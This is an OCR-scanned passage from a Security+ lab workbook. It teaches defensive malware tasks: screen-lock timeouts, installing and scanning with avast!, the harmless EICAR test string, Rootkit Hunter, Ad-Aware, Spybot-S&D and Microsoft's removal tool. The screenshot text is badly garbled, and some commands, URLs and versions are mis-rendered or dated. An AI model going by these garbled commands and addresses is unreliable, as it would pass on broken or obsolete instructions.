Configure a wait time of 1 minute.

Click the On Resume, Display Logon Screen check box.



108

Phase 2 = Hardening Systems

3 Screen Saver Settings X|

Screen Saver |

~ Screen saver
T |  Sctings. | Preview

Wait: 1 =1 minutes ¥ On resume, display logon screen

~ Power management

Conserve energy or maximize performance by adjusting display
brightness and other power settings.

Change power settings

| OK I Cancel Apply

)/ Typically, you would set the wait time (idle time-out) value to 5 minutes
deE for very strict (and annoying) security, 15 minutes for strong security, and

10.

1.

12.

13.

30 minutes for the standard user. In this exercise, you are setting this idle
time-out value to 1 minute to quickly verify its functionality.

Click OK to apply the new configuration and close the dialog box.
Close Control Panel.

Do not touch the mouse or keyboard for at least one minute. The screen saver should
launch.

Once the screen saver launches, move the mouse to deactivate it. Note that the system
is locked.

On the keyboard, press Ctrl+Alt+Delete.



14.
15.
16.
17.

18.
19.
20.
21.
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Log on to a system as the Local or Domain Administrator.
Allow the desktop to stabilize.
Click the Start menu and select Control Panel.

In the upper-right corner of the Control Panel window, in the search field, type
screen saver.

Select the Turn Screen Saver On Or Off option.
Configure a wait time of 30 minutes.
Click OK to apply the new configuration and close the dialog box.

Close Control Panel.

Criteria for Completion

You have completed this task when you have demonstrated three ways to manually
lock a computer and have configured and tested a password-protected idle time-out to
automatically lock a computer when it may have been left unattended.
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This phase of the book addresses some of the threats a security

administrator must deal with on a day-to-day basis. Just one

of these concerns is malware, which includes viruses, worms,
Trojans, and spyware.

In this phase, we will teach you the hands-on skills you need to address these concerns
and show you how to tackle them. Specifically, you will learn how to use antivirus
software, run a rootkit checker, check for various types of spyware and adware, use tools
to remove malicious software, improve browsing habits to increase safety, and understand
certain risks in order to better protect against them.

The tasks in this phase map to Domain 3 objectives in the CompTIA Security+
TE exam (www.comptia.org/certifications/Tisted/security.aspx)

Task 3.1: Installing, Updating, and
Running Antivirus Software

Computer viruses have been around for decades; Fred Cohen, an American computer
scientist, originated the term virus in the 1980s. Viruses depend on people to spread them.
Worms, while closely related to viruses, spread without human intervention. Viruses
propagate through three basic means:

Master Boot Record Infection The original method of attack works by attacking the
master boot record (MBR) of floppy disks or the hard drive. It’s now considered ineffective
because so few people pass around floppy disks.

File Infection File infection is a slightly newer form of virus propagation that relies on the
user to execute the file. Extensions such as .com and .exe are typically used. Social engi-
neering is needed to get the user to execute the program.

Macro Infection Macro infection is the most modern of the three types and began
appearing in the 1990s. Macro viruses exploit scripting services installed on your com-
puter. The “I Love You” virus (released in 2000) was a prime example of a macro infector.

Protection against computer viruses is one of the most important and basic security
countermeasures that you can deploy. Some individuals think that deployment of an
antivirus program is enough. Well, that is not true—an out-of-date antivirus program is
little better than none at all.
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Scenario

You have just completed the building of a new system for a client. You are now going to
install and update the antivirus program. You will then make an initial scan with the
antivirus program to make sure the system is clean and ready to be delivered to the client.

Scope of Task

Duration
This task should take about 30 minutes.

Setup

For this task, you will need a Windows workstation or server. You will also need to
download the free avast! antivirus software from www.avast. com.

Caveat

Most antivirus programs do not scan for or prevent spyware. Make sure you understand
what the antivirus software will and will not prevent.
The version of avast! being used for this task is for noncommercial home use only.

Procedure

In this task, you will install, update, and scan a system for viruses using the avast! antivirus
scanning software. avast! is an example of a signature-scanning antivirus program.
Signature-scanning antivirus programs work in a fashion similar to intrusion detection
system (IDS) pattern-matching systems. Signature-scanning antivirus software looks at the
beginning and end of executable files for known virus signatures. Signatures are nothing
more than a series of bytes found in the virus’s code.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Vista, Windows 7, or Windows Server system
s A Local Administrator account

s An Internet connection

Details

The following sections guide you through installing, updating, and running an antivirus
program.
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Downloading and Installing the avast! Antivirus Tool

1. After logging on as a Local Administrator, open Internet Explorer, go to www.avast
.com/free-antivirus-download, and download the current version of the software.

You will be prompted to run, save, or cancel the application. Click Run.

When the download is completed, you will be prompted with the Internet Explorer
security screen. Click Run to continue.

4. You will then be prompted with the avast! setup screen. Click Next to continue.

# avast! Free Antivirus Setup

avast! Installation

Thank you far choosing avast!

This program will install awast! on your computer, The installation will take
just & minute or o,

By clicking the Next buttan, you agree to the
User License Agreement

Installation options

[ Patticipate in the avast! community

By enabling this option, you are giving your consent to
anonymously forward certain security-related information to
avast! [on an az-needed basis)

Privacy palicy

i
S
e

[] Custom installation

5. You will be prompted to read the avast! Read Me file. This file contains basic
information, such as the minimum requirements for installation. Take a few minutes to
review this information. Click Next to continue.

6. You will be prompted to review the license agreement. Click the I Agree radio button.
Then click Next to continue.

7. avast! will now prompt you to choose a destination directory. Leave it as suggested:
C:\Program Files\Alwil Software\Avast5.

8. Before the installation, the program will prompt you to select the installed
configuration. Typical is selected by default. Click Next to continue.

9. The Installation information screen will then appear. Please review the information.
Click Next to complete the installation.

10. You will be asked, “Do you wish to schedule a boot-time antivirus scan of your local
hard drives? The scan will be performed after your computer is restarted.” Click Yes
if you want the computer to perform an antivirus scan on system restart; click No
otherwise.

11. The Setup Finished screen will appear, and you will be prompted with the Welcome to
avast! Free Antivirus screen. Click Close to complete the installation.
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avast!is the most popular antivirus software in the world because of people like you
telling friends about our sward-winning protection.

Thank you for choosing avast! We wart you to keep youwr protection up to dste, get the
latest newes, and let us knove hove to make avast! even better

REGISTER FOR FREE

To receive your avast! virus database updates,

register now in & few essy steps. Register Mow

SUBSCRIBE TO AVAST! NEWS

Get the latest nevws on avast! security and

technology - straight from the source Subserine o News

HELP IMPROVE AVAST!

Take a minute to help us improve avast!

products by answering a few guestions Gota SUNB!"

STAY CONNECTED VIA OUR COMMUNITY PAGES L n

Close

Updating avast! Antivirus

Although most antivirus programs check for updates periodically, it is still a good idea
to make sure you have the most recent version. This is particularly important when
performing a new installation or when you have been asked to check a system for viruses.

1. To begin the update process, right-click the avast! icon that is located on the

notification tray at the bottom-right corner of the screen.

2. You should now see a menu of options, which include updating. There are two update

options:
= Engine And Virus Definitions

= Program

As you have just downloaded the program, you should check to see that you have the

most current version of the program. Click Program.

Open avast! user interface

avast! shields control
Silentfgaming mode

Engine and virus definitions Update
Program

Show last popup message
Reqgistration information
About avast!

SELUILY

»
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3. After waiting a short period of time, you should receive a message that the signatures
have been updated.

4. Click Close in the summary window to complete this task.

Performing an Antivirus Scan

1. Right-click the avast! icon located on the notification tray at the bottom-right corner of
the screen and select Open avast! User Interface.

2. Once the window opens, you’ll be presented with the avast! user interface. There are
three choices on this page:

Scan Computer This option scans the system.

Real-Time Shields This option shows the status of your protection.

Maintenance This option updates the antivirus engine and definitions.

D HeLP cENTER

R, SETTNGS 4 LPGRADE

SECURED
w “four system s fully protected
~ Show Detalls... ¥

Program awaiting registration, please register.

Wour protection against viruses and spywars wil expire in 30 days
*ou need 1o register the program to stay protected.

G ] © Register now

L) SILENT/GAMING MODE: OFF Turn on

avarst! will display on-screen messages/op-ups/slerts and play sounds as needed. However, nothing will be displayed if a full-screen
application i running

Change settings

MAXIMIZE YOUR PROTECTION

[ ‘ avast! Internet Security maximizes your virus and spyware protection with these

W security features:

== virtual environment avast! Sandbox for safer shopping and banking online
#F Silent Firewall against hacker attacks
== SPAM and "phishing" scam email filter ta keep your inbox clean

avast! News Service

-

|

3. Select the Scan Computer option. Select Quick Scan, and then click the Start button at
the right side of the interface. The program will then start scanning memory and the
selected drive. If a virus is found, a warning will appear.
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SCAN COMPUTER

Scan Mow
Boot-time Scan

Scan Logs

Once the scan is completed, you will be presented with a report telling you what was

Quick scan
Performs & quick scan of your computer's system volume and operating memory

Full system scan
Performs an in-cepth scan of the system (thorough but slower ).

Removable media scan
Scans all remavable media currertly altached to the computer.

Select folder to scan
Performs & full scan of a custom folder (to be selected when the scan is started)

*You can use the contrals below to run & pre-cefined scan or to create = custom scan of your own. Muliple scans can be run at the
N, oot

o Stant

More details ¥

o Start

More details ¥

o Stant

More details ¥

b Start

More details ¥

Create Custom Scan

found. In this example scan, four suspicious programs were found.

SCAN COMPUTER

Scan Nove
Boatime Scan

Sean Lags

*ou 2an use the controls helaw ta run & pre-defined scan of ta create & custom scan of Your ovn. Muliple scans can be run &t the

&
R,
) N el
Quick scan
A
% THREAT DETECTED!
Run time: 00025
Tested files: 881
Tested folders "7
Amourt of data testes: 71 MB
Infected files: 4

Full system scan
Performs an in-depth scan of the system (tharough bt slower).

Removable media scan
Seans al removable media currertly attached 1o the computer

Select folder to scan
Performs & full scan of & custom folder (to be selected when the scan is started)

D HELP CENTER

SHOW RESULTS

Fewer details &

o Start

More details ¥

o Stait

Mare detalls ¥

o Stait

-

Creste Custom Scan
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5. By selecting Show Report, you will be presented with a more detailed listing of the

threats that were found on your computer.

THREAT DETECTED!
Select the required action for each result and click " Apply”.

File name
Crsppsislteverap sxs
Civappsttiniexe

Severty
High
High

CriDocuments and SeftingsiAd stk exe  High
CiDocumerts &.. \HTTP Brute Forcer exe  High

Status

Theat: Win32: Trojan-gen
Threat: Win32: Tiny-XU [Trj]
Theat: Win32: Trojan-gen
Threst: Win32:VB-RG [Wrm]

Apply

Testing the avast! Antivirus Tool

2

1. Copy the following into a text file and rename it samplevirus.exe:

Action

Move to Chest
Mowe to Chest
Move to Chest
Mowe to Chest

Result

Apply this action for sl

Miove to Chest

Hopefully you did not find any viruses on your computer. The purpose of
this portion of the exercise is to give you a better understanding of how
signature-scanning antivirus software works.

X50! P%@AP[4\PZX54(P")7CC)7$EICAR-STANDARD-ANTIVIRUS-TEST-FILE! $H+H*

2. Start avast! and scan for viruses. In a few moments you should notice that avast! finds
the file and identifies it as a virus.

Although it is not actually a virus and the code is harmless, it does match a known virus
signature. The code was developed by the European Institute of Computer Anti-Virus
Research (EICAR) to test the functionality of antivirus software.
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In real life, virus creators attempt to circumvent the antivirus signature

JTE process by making viruses polymorphic. A polymorphic virus modifies
itself from infection to infection, making it hard for antivirus software to
detect it.

Criteria for Completion

You have completed this task when you have accomplished the steps in this exercise. You
will then know how to install an antivirus program, how to update an antivirus program,
and how to use an antivirus program to scan for viruses.

Task 3.2: Using a Rootkit Checker

It is of the utmost importance that as a security professional you maintain control of your
systems and be able to detect whether an attacker has compromised any of your systems.
One of the most common tools an attacker will use is a rootkit. Rootkits are nasty pieces
of malware. Attackers use rootkits to gain control of a victim’s system. Rootkits contain
tools to replace executables for many of the operating system’s critical components. Once
an attacker has installed a rootkit, it can be used to hide evidence of the bad guy’s presence
and to give them backdoor access to the system at will. Once the rootkit is installed,
the attacker can come and go at any time and their activities will be hidden from the
administrator. Some rootkits even contain log cleaners that attempt to remove all traces of
an attacker’s presence from the log files.

Rootkits can be divided into two basic types. Traditionally, rootkits replaced binaries,
such as 1s, ifconfig, inetd, killall, Togin, netstat, passwd, pidof, or ps with
Trojaned versions. These Trojaned versions have been written to hide certain processes
or information from the administrator. The second type of rootkit is the loadable kernel
module (LKM). A kernel rootkit is loaded as a driver or kernel extension. Both types can
be a real problem. If you suspect that a computer has been infected with a rootkit, you will
need to run a rootkit checker on the system to ensure that it has not been compromised.
This will be your objective for this task.

Scenario

One of your clients has asked you to examine a Linux server. Your client is worried that
a former employee may have compromised the system by installing a rootkit on it before
quitting. Your task will be to examine the system and verify its integrity.
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Scope of Task

Duration
This task should take about 30 minutes.

Setup

For this task you will need a Linux computer and an Internet connection, and you must
have the ability to download files.

Caveat

When working with the Linux system, you will need access to the root account. You will
want to use this account carefully. The root account has full and complete control of the
Linux system. The root account has complete access to all files and commands, can modify
the system in any way, and can grant and revoke any permissions. Unlike with Windows
systems, you may not be prompted several times before a critical change is made.

Procedure

In this task, you will learn how to run a rootkit checker on a Linux system.

Equipment Used

For this task, you must have:

= A Linux system (such as Red Hat or equivalent)

s A CD-based version of Linux (such as BackTrack or Knoppix)

] Access to the root account

Details

This task will progress through several steps. First you must download the rootkit checker
and install it. Then you will execute it and examine its various options. The tool used in
this task is Rootkit Hunter. Rootkit Hunter is an open source tool that checks machines
running Linux for the presence of rootkits and other unwanted tools. You can learn more
about Rootkit Hunter and verify that Rootkit Hunter has been tested on the Linux system
you are using by visiting the site at www. rootkit.n1/projects/rootkit_hunter.html.

Downloading and Installing Rootkit Hunter

1. Once you have accessed your Linux system, you will need to open a root terminal and

download Rootkit Hunter. To do so, you must enter the following at the command-line
shell:

wget http://downloads.rootkit.nl/rkhunter-version.tar.gz
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)’ The version syntax will require you to enter the current version of the
A TE software. As of this writing, version 1.3.8 is the most current version, so
you would enter rkhunter-1.3.8.tar.gz.

2. Once the download is completed, you will need to unpack the archived file. Enter the
following from the command line:

tar zxf rkhunter-version.tar.gz

This will extract the Rootkit Hunter files.

3. To install Rootkit Hunter, you first need to change directories. The install directory
will be the one below your current location. Enter cd rkhunter.

4. Once you are in the proper directory, you need to run the installer. This will complete
the installation. Enter ./installer.sh.

5.  You should be able to see that the installation was completed successfully. This code
shows the type of syntax of a successful installation:

Rootkit Hunter installer 1.3.8 (Copyright 2004-2009, Michael
Boelen)

Starting installation/update

Checking /usr/Tocal... OK

Checking file retrieval tools... /usr/bin/wget

Checking installation directories...

- Checking /usr/local/rkhunter...Exists

- Checking /usr/local/rkhunter/etc...Exists

- Checking /usr/local/rkhunter/bin...Exists

- Checking /usr/local/rkhunter/1ib/rkhunter/db...Exists

- Checking /usr/local/rkhunter/1ib/rkhunter/docs...Exists
- Checking /usr/local/rkhunter/T1ib/rkhunter/scripts...Exists
- Checking /usr/local/rkhunter/Tib/rkhunter/tmp...Exists
- Checking /usr/local/etc...Exists

- Checking /usr/local/bin...Exists

Checking system settings...

- Perl... OK

Installing files...

Installing Perl module checker... 0K

Installing Database updater... OK

Installing Portscanner... OK
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Installing MD5 Digest generator... OK
Installing SHAl1l Digest generator... OK
Installing Directory viewer... OK

Installing Database Backdoor ports... OK
Installing Database Update mirrors... OK
Installing Database Operating Systems... OK
Installing Database Program versions... OK
Installing Database Program versions... OK
Installing Database Default file hashes... OK
Installing Database MD5 blacklisted files... OK
Installing Changelog... 0K

Installing Readme and FAQ... OK

Installing Wishlist and TODO... OK

Installing RK Hunter configuration file... Skipped (no
overwrite)

Installing RK Hunter binary... OK

Configuration already updated.

Installation ready.

See /usr/local/rkhunter/1ib/rkhunter/docs for more
information.

Run 'rkhunter' (/usr/local/bin/rkhunter)

Running Rootkit Hunter

1.  Once Rootkit Hunter is installed, you are ready to run it. A variety of options
are available to you. To perform a complete check of the system, run Rkhunter —
checkall.

2. Rootkit Hunter can search for many different types of rootkits. Here is a
partial list:

5808 Trojan—Variant A BOBKit

Ambient (ark) Rootkit CiNIK Worm (Slapper.B variant)
Apache Worm Devil Rootkit

Balaur Rootkit Dica

Beastkit Dreams Rootkit

beX2 Duarawkz Rootkit



Flea Linux Rootkit
FreeBSD Rootkit
GasKit

Heroin LKM

HjC Rootkit

ignoKit
ImperalsS-FBRK
Irix Rootkit

Kitko

Knark
LiOn Worm
Lockit/LJK2

mod_rootme (Apache backdoor)

MRK
Ni0 Rootkit

NSDAP (Rootkit for SunOS)

Optic Kit (Tux)
Oz Rootkit
Portacelo

R3dstorm Toolkit

Once the scan is completed, you should receive a message that is similar to the

following:

MD5
MD5 compared: 0

Incorrect MD5 checksums:

File scan

0

Task 3.2: Using a Rootkit Checker

RH-Sharpe’s Rootkit
RSHA’s Rootkit
Scalper Worm
Shutdown

SHV4 Rootkit

SHVS Rootkit

Sin Rootkit

Slapper

Sneakin Rootkit

SunOS Rootkit
Superkit

TBD (Telnet BackDoor)
TeLeKiT

TOrn Rootkit

Trojanit Kit

URK (Universal Rootkit)
VeKit

Volc Rootkit

X-Org SunOS Rootkit

zaRwT.KiT Rootkit

123
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Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 4

Scanning took 15748 seconds

Do you have some problems, undetected rootkits, false
positives, ideas or suggestions?

Please e-mail me by filling in the contact form
(@http://www.rootkit.nl1)

In this example you were lucky to find the system had not been infected, but if it had been,
you would be faced with additional challenges. This is primarily due to the fact that it is
almost impossible to clean up a rootkit. Since hiding is the main purpose of the rootkit, it is
difficult to see whether all remnants of the infection have been removed. You should always
rebuild from well-known, good media. Should you find a rootkit, the program will return a
message similar to this:

MD5
MD5 compared: 0
Incorrect MD5 checksums: 0

File scan

Scanned files: 362
Possible infected files: 1
Netstat possible infected

Application scan
Vulnerable applications: 4

Scanning took 14631 seconds
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Do you have some problems, undetected rootkits, false
positives, ideas or suggestions?

Please e-mail me by filling in the contact form
(@http://www.rootkit.nl)

Criteria for Completion

You have completed this task when you have downloaded Rootkit Hunter, installed it on a
Linux system, and scanned the system for rootkits.

Task 3.3: Adware

The Internet has certainly lived up to its reputation for being a dangerous place. Drive-by
attacks are on the rise. And all it may require is to simply go to the wrong website or download
the wrong program, and you can end up with a system full of adware. Adware can be bundled
with a shareware of free programs or can be secretly installed on users’ computers. This
category of program can be used to spy on users or to deliver them specific ads.

What is particularly annoying about most adware is the way it causes constant pop-ups
on your computer, or redirects you to other sites you do not care to visit. These programs
can even degrade system performance to the point of being unusable.

Scenario

Your battle with malicious software is continuing. A manager has asked if you can look
over several of his employees’ computers. They are complaining that when they access the
Internet their browsers subject them to an endless stream of pop-ups. You suspect their
systems have been infected with adware.

Scope of Task

Duration

This task should take about 30 minutes.
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Setup

For this task, you will need a Windows computer, access to the Administrator account, an
Internet connection, and the ability to download files.

Caveat

While removal programs for adware are quite efficient, you must be careful when asked
to remove programs or components since doing so can cause a lack of functionality or
can sometimes disable required components. While organizations will have the funds to
purchase licensed products, this task utilizes the free, noncommercial version of
Ad-Aware.

Procedure

In this task, you will learn how to install and run Ad-Aware.

Equipment Used

For this task, you must have:

= A Windows computer

= Access to the Administrator account

= An Internet connection

Details

This task will show you how to install and run Lavasoft’s Ad-Aware. This program will
allow you to remove adware and other types of malicious software. It has the ability

to examine the Registry, hard drives, and even system RAM for known data-mining,
advertising, and tracking components.

Installing and Running Ad-Aware
1. Once you have accessed your Windows computer and have logged in as Administrator,
open your browser and go to http://waww.lavasoft.com/single/trialpay.php.
Once the program has completed downloading, execute it from the folder to which it

was saved. This will start the installation process.

2. During the installation you will be prompted to accept the licensing agreement. You
must accept this to complete the installation. Accept all other default settings to
complete the installation. Once the installation is completed, Ad-Aware will start.

3. Upon startup, Ad-Aware will open at the main menu.
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| = Ad-Aware

Ad-Aware® Free
INTERNET SECURITY

g ©

Web Update Scan System Ad-Watch Live!
Status: OK Status: (Not yet performed) Real-time Protection: On

Scan Ad-Watch Extras

News from Lavasoft

Get our monthly nevwsletter delivered directy to your inbosx, 9 Click here for support
packed with waluable industry news, interesting facts and

figures, and up-to-date news and information from Lavasoit.

Cap o
Read more

4. You are now ready to start a scan. You can start by clicking the Scan System button.
After clicking Scan System, you will be prompted to specify the type of scan you would
like to perform:

= Smart Scan
s Full Scan

= Profile Scan

|r"' Ad-Aware il

Ad-Aware® Free
INTERNET SECURI

Scan Scheduler Quarantine Ignore List

L

Scan  Ad-Watch  Exiras

Choose a Scan Mode

ﬁ Settings

Smart Scan Full Scan Profile Scan
Smart Scan Scan Seftings:
The "Smart Scan” is a fast system check v Critical areas v Browser hijacks
that scans only the most critical sections < Running applications  ~ Tracking cookies
of your system v windowes registry ¥ Rootkits
v LEPs

v Executable flles only
¥ Behavior-hased detection
v Anti-wirus engine

() scanton
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5. Depending on the size of the hard drive being scanned and the type of scan being
performed, the scan can take 10 to 20 minutes. Once it’s completed, you will receive a
report that shows any recognized objects.

|r"' Ad-Aware

Ad-Aware® Free
INTERNET SECURI T e Scan | Adowaleh Extras |

Scan Scheduler Quarantine Ignore List
Scan Results
Famity Action  Details
Trojan iind2. GenericlBT Trojan Win32.GenericlBT
Trojan Win32 Malware 3 Malare Mtz Ina
Win32.Exploit.PrintarDyeriiom Gamily astich)
chprogram files\caintoain exe @~
chdocumentst khied tmp exe &J
cdocumentst djkh d tmp_exe &=
chdocuments' \pS a7 tmp.exe @
cdocuments . \pbB08 tmp.exe @
ohdocumentst &J
chdocuments . abinipipe.exe @
chdocuments . amailsnart.exe @
[ 5st System Restore Foint Wthy does Lavasoft recommend this action?
[CI5st action for all entriss =~ @ Perform Actions Now

6. Clicking the Action icon provides detailed options as to how you can deal with any
threats that have been found.

|Tf' Ad-Aware
3
Ad-Aware® Free
INTERNET SECURITY ol i Scan | Ad Watch
Scan Scheduler Quarantine Ignore List
Scan Results
Famihy Action Details
Trojanin3z. GenericlBT N = Win32.Exploit.PrinterOverflow
i ) Explait More Info
Trojanin32 . Malware.a “E Custom =
Win32. Exploit. PrinterOverflouw @ Quarantine all Family Action
x Remoue all chdocuments Laillwin3Z . exe [OFd
3 Repair all

o Allow all once

+ Add all to ignore list

[ 5et System Restore Foint Wihy does Lavasott recommend this astion

[[) 5et action for all entries (L @ Perform Actions Now
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7. The final step in this process is to choose the option Remove All. Review each item
carefully before marking them for removal.

Ad-Aware is designed to report all possible suspicious content present on your system.

This does not mean that everything that was detected by Ad-Aware should be removed. A
security professional must use good judgment in deciding what must go or stay. To help you
in this process, Ad-Aware has developed the Threat Analysis Index (TAI). It lists the threat
level for the items that were found. You can learn more about the TAI by visiting http://
www. Tavasoft.com/support/securitycenter/threat_analysis.php.

When working with a system that is badly infected, we recommend that
TE you use more than one adware tool as some tools may pick up items
others miss.

Criteria for Completion

You have completed this task when you have downloaded Ad-Aware, installed it on a
Windows system, and scanned the system for adware programs.

Task 3.4: Using a Spyware Checker

Spyware is much like adware except that it has the ability to track your activities as you
move about the Internet, as well as capture your keystrokes. This information can be
returned to hackers or advertisers, who use it to track your visits to specific sites and to
monitor your activity. Spyware programs have become increasingly intelligent. Many have
the capability to install themselves in more than one location, and like a malignant disease,
removing one piece of the malicious code triggers the software to spawn a new variant in a
uniquely new location.

Spyware is capable of changing Registry entries and forcing a system to reinstall itself
when the computer reboots. What are some of the worst spyware programs that you
might be exposed to? Well, Webroot (www.webroot.com) has compiled a list, and its top 10
includes titles such as KeenValue, a program that collects user information to target them
with specific pop-up ads. PurityScan is another; it advertises itself as a cleaner that removes
items from your hard drive. Finally, there is CoolWebSearch. This program is actually a
bundle of browser hijackers united only to redirect their victims to targeted search engines
and flood them with pop-up ads. As a security professional, dealing with these types of
programs is something you will be faced with many times.
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Scenario

A coworker believes their computer is acting strangely and may be infected with spyware.
You have been asked to investigate.

Scope of Task

Duration
This task should take about 30 minutes.

Setup

For this task, you will need a Windows computer, access to the Administrator account, an
Internet connection, and the ability to download files.

Caveat

Although spyware-removal programs are quite efficient, you must be careful when asked
to remove programs or components, since doing so can cause a required component to lose
functionality.

Procedure

In this task, you will learn how to install and run Spybot-S&D.

Equipment Used

For this task, you must have:

= A Windows computer

= Access to the Administrator account

s An Internet connection

Details

This task will show you how to install and run Spybot-S&D. This program will allow
you to remove spyware and other types of malicious software. It has the ability to do a
thorough examination of your system, hard drive, Registry, and system RAM for known
malicious programs.

Installing and Running Spybot-S&D

1. Once you have accessed your Windows computer and have logged in as Administrator,
open your browser and go to www.safer-networking.org/en/download/index.html.
Once you download the program, execute it from the folder to which it was saved. This
will start the installation process.
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2. During the installation you will be prompted to accept the licensing agreement. You
must accept to complete the installation. Continue with the setup and accept all
other default settings to complete the installation. Once the installation is completed,
Spybot-S&D will start.

3. Upon startup, Spybot-S&D will launch a wizard that will ask you several questions,
including whether you would like to make a backup of your Registry settings. While
this is not necessary, it is a good idea because it can offer an added level of protection
should the program remove a component that another program needs. Spybot-S&D
will also list programs installed on your computer that may be incompatible; Lavasoft
Ad-Aware will appear on this list if you have it installed on your system. You can click
Ignore and continue scanning.

4. At the main menu of the program are five options on the far-left side of the application:

Search & Destroy This option searches for spyware and other malicious code.
Recovery This option allows you to undo any changes made.

Immunize This option blocks known spyware and adds some preventive measures
against malicious code.

Update This option looks for program updates.

Donations As the program is provided freely, you can choose whether to make
donations to the creator.

/= Spybot - Search & Destroy

File Mode Language

= Spybot-5&0

Help

.- Spybot - Search & Destroy 1.6.2

| Usge this button to start scanning your system for sppware and all
ather threats detected by Spybat - Search & Destray.

~ Use thiz button if you notice some problems that have occured
CX®,R during a recent remaval of problems, and pou want to undo some
changes

Thiz iz very important: it is recommended to update the detections
w Search for Updates at least once a week!

With any antivirus, spyware, or malicious-code scanner, you should always
TE make sure you have the most current version.
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5. From the main menu, begin the scan by selecting Search & Destroy and then clicking
Check For Problems. The scan will start at this point.

‘r"= Spybot - "Search'& Destroy

File Mode Language Help

earch & Destroy

x Stop check @ Help

Please wait, scan in progress...

This i the main scan page of Spybot-530. Here pou scan your system [“"Check for problems™
button] and fix anw prablems found ['Fix selected problems" buttan). Hint: if you hawen't dane 30
vet, we recommend you read the tutorial [s== Help menu) ta leam how to deal with the scan
results,

Hide this information

Problem

6. Once the scan is completed, you will have a list of the problems detected. Spend time
looking through these. As you review each item, you will be offered more details. This
should give you what you need to make an intelligent choice about whether to remove
or keep the item.

/= Spybot - Search & Destroy
Fie

Mode Langusge Help

p LCheck for problems @EEM selected problems % Print @ﬂelp

yet. we recommend pou read the tutarial [see Help menu] to learn how to deal with the scan

This is the main $can page of Spebot-5&D. Here you scan your system [“Check. for problems"*
button) and fix any problems found (“Fix selected problems” buttan). Hint: if you haven't done so
results.

Hide this information

Problem Kind
2 entries
=] BurstMedia Browser
Tracking cackie [Intemet Explarer: mike) Cackie N
Cookie mike@hurstnet com/ [] L)
Tracking cackie [Intemet Explarer: mike) Cackie N
Cookie mikei@ww bursmet com/ ) L)
1 entries
I CasaleMedia Browser
i Tracking cockie (Intemet Explorer: mike] Cockie
[ Coakie mikei@oasalemeria com/ () @
1 entries
= DoubleClick Browser

15 problems found (23:38)
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7. The final step in this process is to click the Fix Selected Problems button to check the
items you wish to remove.

When working with a system that is infected, you may find it necessary to
TE use several antispyware tools to remove the infection.

File Mode Language Help

yet, we recommend you read the tutarial (see Help menu] to learn how to deal with the scan

Thig iz the main scan page of Spybot-540. Here you scan your system ['Check for problems
button] and fix any problems found ["Fix selected problems" button). Hint: if you haven't done so
results

Hide thiz infarmation

Problem Kind
2 entries
=} “ BurstMedia Browser
Tracking cookie [Intemet Explorer: mike] Cookie
Cookie:mike@burstnet.com/ [] %
Tracking cookie [Intemet Explorer: mike] Cookie
Cookie:mike@wwi bursthet. com/ () %
1 entries
[—--“ CasaleMedia Browser ‘
H Tracking cookie [Intemet Explorer: mike] Cookie
Cookie:mike{@casalemedia. comd (] &z}
1 entries
= “ DoubleClick Browser
0

15 prablems found [23:36]

Criteria for Completion

You have completed this task when you have downloaded Spybot-S&D, installed it on a
Windows system, and scanned the system for spyware programs.

Task 3.5: Malicious Software
Removal Tool

Much of a security professional’s responsibility involves preventing and removing
malicious software. Malicious software continues to be a real problem. Infection may
require nothing more than opening an email, browsing a web page, or simply plugging in a
USB thumb drive.

Although many commercial tools have been developed to deal with this threat, there are
also some simple, low-cost, and even free solutions. This exercise will look at one of these.
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Scenario

A coworker accepted a game from an acquaintance and installed it from the acquaintance’s
USB thumb drive. Since the game was installed, the computer has been performing
erratically. The user has also noticed that clicking on a drive no longer opens it; instead, the
user now must right-click and choose the Open command.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task, you will need a Windows computer, access to the Administrator account, an
Internet connection, and the ability to download files.

Caveat

Malware-removal programs are quite efficient, but you must be careful when asked
to remove programs or components, since this can cause the lack of functionality of a
required component.

Procedure

In this task, you will learn how to run Microsoft’s Malicious Software Removal tool.

Equipment Used

For this task, you must have:

= A Windows computer

s Access to the Administrator account

s An Internet connection

Details

This task will show you how to install and run Microsoft’s Malicious Software Removal
tool. This program will allow you to remove malicious software. The tool is freely
distributed by Microsoft and is updated every month.

Installing and Running Microsoft’s Malicious Software Removal Tool

1. Once you have accessed your Windows computer and have logged in as Administrator,
open your browser and go to www.microsoft.com/security/malwareremove/default
.mspx, and click the link to download the program.
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Once you start the download, a prompt will ask you if you would like to run on
completion of installation. Choose Yes and allow the program to install and start.

Upon startup, the Malicious Software Removal Tool will launch a wizard that will ask
you several questions. You will first be prompted to continue through the product or to
view online documentation.

“='Microsoft’ Windows Malicious Software Removal 1-:: z

Welcome to the Microsoft Windows Malicious Software Removal Tool ;
This tool scans For and aukomatically removes prevalent malicious software -

Click Mext ta scan for and help remaove specific malicious software From your computer.
For more information on this tool, please see the online documentation.

View a list of malicious software that this tool detects and removes.

This tool is not a replacement For an anti-virus product. To help protect your computer,
wou should use an anti-virus product, For mare information, see Protect Your PC,

At the Scan Type screen, you will have the option of a quick scan (the default), a full
scan, or a customized scan. A quick scan looks at areas of the system most likely to be
affected by an infection. A full scan reviews all files and folders along with memory
and the Registry. A customized scan allows you to specify what is to be scanned. For
this exercise, select a quick scan.

Scan type ;/J
-

Please choose a bype of scan:

® Quick scan, Scans areas of the system most likely to contain malicious software, If
malicious software is found, you may be prompted to run a full scan.

O Full scan. Scans the entive system. Mote that this scan can take up to several hours on
S0mE compukers,

o Cuskomized scan, In addition to a guick scan, the tool will also scan the contents of &
user-specified Folder,

« Back. H Mext > ][ Cancel ]
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With any malicious-code scanner, you should always run the most current
TE copy. Microsoft updates this tool monthly.
Begin the scan by selecting Next. The scan will start at this point.

Once the scan is completed, you will have a list of any suspicious programs that
were detected. You can remove these items at this time. Keep in mind that any
recent backups are most likely infected. Therefore, a backup postcleaning should be
completed.

Scan results P/J
-

@ o malicious software was detected.

Wiew detailed results of the scan.

This taol is nat a replacement far an anti-wirus product. To help protect your
computer, you should use an anti-virus product, For more information, see
Protect {four PC.

7. The final step in this process is to click Finish to close the Malicious Software
Removal Tool.

This type of tool is not a replacement for antivirus. The Malicious Software
TE Removal Tool is a postinfection product designed to clean up systems that

are already infected.

Criteria for Completion

You have completed this task when you have downloaded the Malicious Software Removal
Tool, installed it on a Windows system, and scanned the system for malware programs.
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Task 3.6: McAfee Site Advisor

Many of the tools we have used in this phase of the book have examined ways to clean up
a system once it is infected. What if we could provide Internet users with a tool to prevent
infection and instill better browsing habits? That is what this task will investigate. You will
